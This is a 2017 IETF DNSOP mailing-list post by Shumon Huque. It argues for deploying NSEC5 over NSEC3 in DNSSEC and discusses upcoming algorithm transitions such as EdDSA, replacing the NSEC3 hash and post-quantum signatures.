Here are some of my arguments in support of NSEC5.
I would like to see us deploy an authenticated denial of existence
mechanism that is not eminently susceptible to offline dictionary
attack. My experience so far is that most people in the crypto
community do not look favorably on NSEC3. Not just Dan Bernstein,
whose strong criticisms are well known (and correct in my opinion).
IETF protocols should pass muster with the professional cryptographer
community.
I don't mean to bash NSEC3 - I think it was the best solution at the
time given the constraints we imposed on ourselves. But it might be
time to look forward.
I certainly agree that the deployment challenges are significant.
But we have several similar challenges already on the radar, which
we will have to tackle:
- EdDSA
- NSEC3 hash replacement
(The recent SHA-1 collision news does not pose an immediate threat
to NSEC3, but will surely put pressure on us to upgrade the hash
algorithm on the well known principle that attacks will inevitably
get better fast.)
- Post Quantum Crypto algorithms (slightly longer term, but something we
need to start designing very soon).
I also wonder, given the challenges of deploying new algorithms, and
the downsides to multiple signing due to packet size concerns - is it
time to design an algorithm negotiation protocol for DNSSEC? It would
have the same initial deployment challenge, but then could help out with
new algorithm transitions going forward.
Arguably, there is an additional "implementation challenge" for NSEC5,
which is a bit more complex than rolling out just a new DNSSEC algorithm.
But I think the implementation work already done presents a positive
picture.
I know several additional folks who have expressed interest in NSEC5 -
I hope they'll speak up.
On Fri, Mar 10, 2017 at 12:46 PM, Warren Kumari <war...@kumari.net> wrote:
> Especially with the prevalence of passive DNS services, I believe that
> publishing something in the DNS makes it "public" - sure, you can hide
> some things behind split-DNS, but putting `super-skrit-key.exmaple.com
> IN 600 TXT "Hunter3"` is guaranteed to end poorly.
>
> NSEC5 has some very cute tricks, but I don't agree with the premise
> that it solves a real world problem.
>
Apparently there are many folks in the community who think so, otherwise
NSEC3 would not have been developed. I personally don't care for any zones
that I run. But if we are providing a solution for folks that do care, we
should
have the most secure (yet practical) solution we know how to design.
--
Shumon Huque
_______________________________________________
DNSOP mailing list
DNSOP@ietf.org
https://www.ietf.org/mailman/listinfo/dnsop
